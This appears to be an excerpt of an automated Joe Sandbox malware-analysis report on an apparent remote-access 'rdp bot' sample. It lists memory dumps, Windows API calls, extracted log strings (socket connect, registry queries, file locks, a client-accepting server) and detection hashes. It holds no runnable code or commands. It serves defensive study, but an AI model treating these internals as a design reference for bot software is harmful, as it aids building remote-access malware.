                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: strlen$Heap_mbscpy$AllocFreeHandleLibraryModuleProcess
                                                      • String ID: [E] (%s) -> Failed(name=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(name=%s)$[I] (%s) -> Loaded(f_path=%s)$mem_alloc$unit_cleanup$unit_init$units_init
                                                      • API String ID: 548194777-214984806
                                                      • Opcode ID: 6f04a3ac30b96920190a4090dd1e2e38484ea8572020f9663c02a833a678134c
                                                      • Instruction ID: 0f7d0b5c25569007352f94680dd376f0f8b1d9e8557b903b6c5c0e174d295aa1
                                                      • Opcode Fuzzy Hash: 6f04a3ac30b96920190a4090dd1e2e38484ea8572020f9663c02a833a678134c
                                                      • Instruction Fuzzy Hash: 21816EA5A0864381FA61BB55FC50BBAE3A1AF44798FC44031DA4F07799EF7CE906C760
                                                      APIs
                                                      • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000021B15D113D0,?,00007FF70CAE8500,00007FF70CAD1669), ref: 00007FF70CAD68B7
                                                      • LockFileEx.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000021B15D113D0,?,00007FF70CAE8500,00007FF70CAD1669), ref: 00007FF70CAD68F0
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000021B15D113D0,?,00007FF70CAE8500,00007FF70CAD1669), ref: 00007FF70CAD69C5
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000021B15D113D0,?,00007FF70CAE8500,00007FF70CAD1669), ref: 00007FF70CAD6AAA
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000021B15D113D0,?,00007FF70CAE8500,00007FF70CAD1669), ref: 00007FF70CAD6C1E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLast$CloseCreateHandleLock
                                                      • String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$service
                                                      • API String ID: 2747014929-2960251455
                                                      • Opcode ID: 8fc40516025b69d713b2c35ef962e398e0df903b16a14ab3aaeabe9612dbb93f
                                                      • Instruction ID: 5f86aa43def5e6cf0f6315d3cde146602b136201a333f9d3d0e2ef2c4c5a389b
                                                      • Opcode Fuzzy Hash: 8fc40516025b69d713b2c35ef962e398e0df903b16a14ab3aaeabe9612dbb93f
                                                      • Instruction Fuzzy Hash: 5E813FE0E4C74B81FB30B794BC40BBCB2509F10358ED44632E96F066D9EF6DA9859362
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                      • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                      • API String ID: 3154682637-708158336
                                                      • Opcode ID: 0a4862cfda780c714fe174f871a044bfed7ed8bd71ba60d4e37772747565a8be
                                                      • Instruction ID: 228fd1e2095d23d4075e9549f22650258e6e08271a86d80f284768dbc6c1beba
                                                      • Opcode Fuzzy Hash: 0a4862cfda780c714fe174f871a044bfed7ed8bd71ba60d4e37772747565a8be
                                                      • Instruction Fuzzy Hash: 9D51E429B0EA4E42EA224F15E8283797650BF43F70F440735EA2D467E7EE7EE4458348
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                      • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                      • API String ID: 3154682637-708158336
                                                      • Opcode ID: 1af0a60acd5ccf9b54b11c4024afb91885eb9b6538cd05742696de47e21a07a6
                                                      • Instruction ID: d6884e8fa3b582024c65938b98894fb9bb1181dec41887f412d5a83290252f99
                                                      • Opcode Fuzzy Hash: 1af0a60acd5ccf9b54b11c4024afb91885eb9b6538cd05742696de47e21a07a6
                                                      • Instruction Fuzzy Hash: 6551C66BB0E68AC1E662DF55E82037D2691AF86F60F044335ED2E467D7DE3CE5458308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                      • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                      • API String ID: 3154682637-708158336
                                                      • Opcode ID: 4b3114bb8f1a0e19b7ba76fb0e8f772d0eaf8da3374d707c85de736b9ef179c3
                                                      • Instruction ID: c0ddb0e8822d51d20ee202e27e0348a20556cdce9f5c8433fe629f1e30f1cf50
                                                      • Opcode Fuzzy Hash: 4b3114bb8f1a0e19b7ba76fb0e8f772d0eaf8da3374d707c85de736b9ef179c3
                                                      • Instruction Fuzzy Hash: A151E122B0F64381EA209B59E8202796290FF847F0F584736E86D427D7DFBCE595934C
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                      • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                      • API String ID: 3154682637-708158336
                                                      • Opcode ID: de2d5cbdf5353413bc1c648729311be83d8657ff32f246b9fa5e0b3037bf1a6c
                                                      • Instruction ID: d7c902642072cb699e677791551143b58bed0886583037a640062ede6e87f3a5
                                                      • Opcode Fuzzy Hash: de2d5cbdf5353413bc1c648729311be83d8657ff32f246b9fa5e0b3037bf1a6c
                                                      • Instruction Fuzzy Hash: 4351E629B0E65B82E7225F14A86037A2690AF67F60F500735D92D477E7EF7CE5088708
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                      • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                      • API String ID: 3154682637-708158336
                                                      • Opcode ID: 8c389301406f169cc07bf59ee58e6666b8cd02130e6e3338fa2688858316811d
                                                      • Instruction ID: d31eb3af9492da219be6e18777db012e3e86cb192eb912e4c6cb3f3e705c3b88
                                                      • Opcode Fuzzy Hash: 8c389301406f169cc07bf59ee58e6666b8cd02130e6e3338fa2688858316811d
                                                      • Instruction Fuzzy Hash: 68510867B0E64381E7229B15E8203BA6690EF817F8F240335E86D477D7DE3DE8058709
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                      • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                      • API String ID: 1412730629-3633878399
                                                      • Opcode ID: 0aefdcde693bddb611edd44b3ad8701c3f1d8df804145e3df866cb1fd0c990e5
                                                      • Instruction ID: 8b616aa337548f112a1d914a79513a29c1f8ee65d656e895956eefef6fe37e2b
                                                      • Opcode Fuzzy Hash: 0aefdcde693bddb611edd44b3ad8701c3f1d8df804145e3df866cb1fd0c990e5
                                                      • Instruction Fuzzy Hash: 3851EF18F0E60F85FB324F14D4B837952909F07B25F514A36C66D053E3EE6EE946C259
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                      • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                      • API String ID: 1412730629-3633878399
                                                      • Opcode ID: adcc1ee1f53cf1c228e0c3686a888ec28b5ef521e519b6c1113744f51f24eeaf
                                                      • Instruction ID: 549c4f5b7d33aa6a2646a7a8d745508828484459a84ecbe33d10b50877785e0f
                                                      • Opcode Fuzzy Hash: adcc1ee1f53cf1c228e0c3686a888ec28b5ef521e519b6c1113744f51f24eeaf
                                                      • Instruction Fuzzy Hash: 6C510A2BF0E78BCAF622DF54A4A037812509F07B64F244232C96E463E79E5DA995C24D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                      • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                      • API String ID: 1412730629-3633878399
                                                      • Opcode ID: 18749ea8e54ff38a3d6f540356451a6bd12c8bb3744cee5c53612f92e5bab22b
                                                      • Instruction ID: 7c734df898682b79db8db3e18c911a642bc94a5bf09fe0ea9a2cb3ad34c39f0e
                                                      • Opcode Fuzzy Hash: 18749ea8e54ff38a3d6f540356451a6bd12c8bb3744cee5c53612f92e5bab22b
                                                      • Instruction Fuzzy Hash: BA511B21B0F74389FA215B44A8E43792294AF043F4F240232C97D463E7DF6DE8E5A29D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                      • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                      • API String ID: 1412730629-3633878399
                                                      • Opcode ID: 07f72c3b8b9488efb92cddfd367c0e8c4ae3d51ddbf75a6cd52b37289039b883
                                                      • Instruction ID: 502ca39f07c77de7c1bd73b4828666f3b0f975ceb0ce8f67b38bdcc011f62c83
                                                      • Opcode Fuzzy Hash: 07f72c3b8b9488efb92cddfd367c0e8c4ae3d51ddbf75a6cd52b37289039b883
                                                      • Instruction Fuzzy Hash: 18511E28F0E70B85F7225F54A4A037812509F07F64F644B36C56E067E3FF6DA985924D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                      • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                      • API String ID: 1412730629-3633878399
                                                      • Opcode ID: 6fa0ebc06db686e59de84f53dfcc884bfb6d9f6c9c983a3cd456ffb907efceae
                                                      • Instruction ID: 8c3f5491bce0585cb3f091c0fb96a832e75eddfacea02adf542e2b39286b9c9c
                                                      • Opcode Fuzzy Hash: 6fa0ebc06db686e59de84f53dfcc884bfb6d9f6c9c983a3cd456ffb907efceae
                                                      • Instruction Fuzzy Hash: 3D510C6EF0EB03C2F6675714A5A43781290AF243F8FA44736C56E063E7DE6DE845824E
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                                                      • String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc$service
                                                      • API String ID: 1423203057-455140666
                                                      • Opcode ID: 35243e979596ad422c2f18207ff51bd9580465b6590dea18778290f8818280f5
                                                      • Instruction ID: 09da325f7e34692e0f79f68bfbccb3647551e24f0097fd106239c02b46137224
                                                      • Opcode Fuzzy Hash: 35243e979596ad422c2f18207ff51bd9580465b6590dea18778290f8818280f5
                                                      • Instruction Fuzzy Hash: F4A1D4E2A0E68295EE10AB05FC00BB9A771AF44B95FC84035DA4F477A9DF7CE945C321
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: OpenQueryValuefflushfwrite
                                                      • String ID: (key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                      • API String ID: 1980715187-910542497
                                                      • Opcode ID: 6c1ab389037e3008b7792e2b6071de4ca39f8c1e13feda42e4c345670232ac5d
                                                      • Instruction ID: d1ebc88919e6b34e2de3604bd2ec74aede702af96f83e004e638767c223b46bc
                                                      • Opcode Fuzzy Hash: 6c1ab389037e3008b7792e2b6071de4ca39f8c1e13feda42e4c345670232ac5d
                                                      • Instruction Fuzzy Hash: ADA110E091C70B91FA30B720BC44BBAA650AF04748FD40132DA1F076A9EF6DE949D362
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: Heap$CriticalProcessSection$AllocCreateEnterErrorFreeLastLeaveThread
                                                      • String ID: [E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Client accepted(client=0x%llx)$[I] (%s) -> Server ready(ssock=0x%llx)$mem_alloc$routine_accept
                                                      • API String ID: 871770459-375624272
                                                      • Opcode ID: 501e596d01d368ba44fe74e58d57c78eb87be7e410ca6c051b90cc79acd898b9
                                                      • Instruction ID: d02e3ab01caff759d5d1863ae5b169edfe3d2c745db780062c6abbeeffbc7f2f
                                                      • Opcode Fuzzy Hash: 501e596d01d368ba44fe74e58d57c78eb87be7e410ca6c051b90cc79acd898b9
                                                      • Instruction Fuzzy Hash: 8F514F60B0AA0B83FA155B15A8303B96250AF47FA6F154B31DA2E077E3DE7EE5418349
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
